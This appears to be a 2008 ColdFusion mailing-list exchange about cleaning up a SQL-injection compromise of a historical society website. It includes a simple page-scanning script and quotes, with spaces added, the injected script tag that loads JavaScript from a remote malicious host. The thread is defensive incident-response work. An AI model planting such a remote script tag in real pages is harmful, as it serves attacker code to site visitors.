Thanks Brad! I ran a string search through the entire database and was able to find a couple records that still had scripts in them. Hopefully I got all of them... I searched for "script", ".js" etc... just requested another review, keeping fingers crossed.
Thanks! -----Original Message----- From: Brad Wood [mailto:[EMAIL PROTECTED] Sent: Thursday, October 09, 2008 6:57 PM To: cf-talk Subject: Re: attack site / sql injections HELP! Tim, I have confirmed you do in fact still have at least one page on your site with malicious content. I just created a simple script which hit every page Google has for your site and breifly analyzed the source. I googled for "site:connhisto.org" I then copied and pasted the 24 links into a list and ran this code: <cfoutput> <cfset sites = "http://www.connhisto.org/~http://www.connhisto.org/index.cfm?p=10~http: //www.connhisto.org/index.cfm?p=3&pid=4231~http://www.connhisto.org/inde x.cfm?p=3&pid=4233~http://www.connhisto.org/index.cfm?p=3&pid=4221~http: //www.connhisto.org/index.cfm?p=3&pid=4234~http://www.connhisto.org/inde x.cfm?p=3&pid=4224~http://www.connhisto.org/index.cfm?p=10&documentid=63 09&q=1~http://www.connhisto.org/index.cfm?p=10&documentid=6321&q=1~http: //www.connhisto.org/index.cfm?p=4&pid=4221&spid=4222~http://www.connhist o.org/index.cfm?p=4&pid=4220&spid=4259~http://www.connhisto.org/index.cf m?p=11~http://www.connhisto.org/index.cfm?p=7~http://www.connhisto.org/i ndex.cfm?p=4&pid=4224&spid=4228~http://www.connhisto.org/index.cfm?p=3&p id=4220~http://www.connhisto.org/index.cfm?p=4&pid=4224&spid=4226~http:/ /www.connhisto.org/index.cfm?p=10&documentid=6291&q=1~http://www.connhis to.org/index.cfm?p=4&pid=4224&spid=4229~http://www.connhisto.org/index.c fm?p=4&pid=4221&spid=4223~http://www.connhisto.org/index.cfm?p=4&pid=422 4&spid=4230~http://www.connhisto.org/index.cfm?p=10&documentid=6318&q=1~ http://www.connhisto.org/index.cfm?p=4&pid=4224&spid=4225~http://www.con nhisto.org/index.cfm?p=10&documentid=6316&q=1~http://www.connhisto.org/i ndex.cfm?p=4&pid=4220&spid=4261"> <cfloop list="#sites#" index="site" delimiters="~"> <cfhttp url="#site#"></cfhttp> #site# (#cfhttp.statuscode#)<br> <cfif cfhttp.filecontent contains ".js" or cfhttp.filecontent contains ".htm"> <span style="color:red">Bad!</span><br> <cfelse> <span style="color:green">Good!</span><br> </cfif><br> </cfloop> </cfoutput> This code is way too generic and wouldn't work on most sites, but since you don't seem to have ANY .js files or .htm links, it was relativley easy to find your bad apple. THIS PAGE (don't click! Spaces added to prevent auto-linking): http:// www. connhisto. org/ index.cfm? p=3& pid=4220 has this script (don't click! Spaces added to prevent auto-linking): : <script src="http:/ /sdo. 1000mg. cn/ csrss/ w.js"></script><!-- Immediatley following this text: If you have a job opening you would like to list on our site, please e-mail Amos You should clean that page or the database table that populates it. ~Brad ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~| Adobe® ColdFusion® 8 software 8 is the most important and dramatic release to date Get the Free Trial http://ad.doubleclick.net/clk;207172674;29440083;f Archive: http://www.houseoffusion.com/groups/cf-talk/message.cfm/messageid:313731 Subscription: http://www.houseoffusion.com/groups/cf-talk/subscribe.cfm Unsubscribe: http://www.houseoffusion.com/cf_lists/unsubscribe.cfm?user=89.70.4
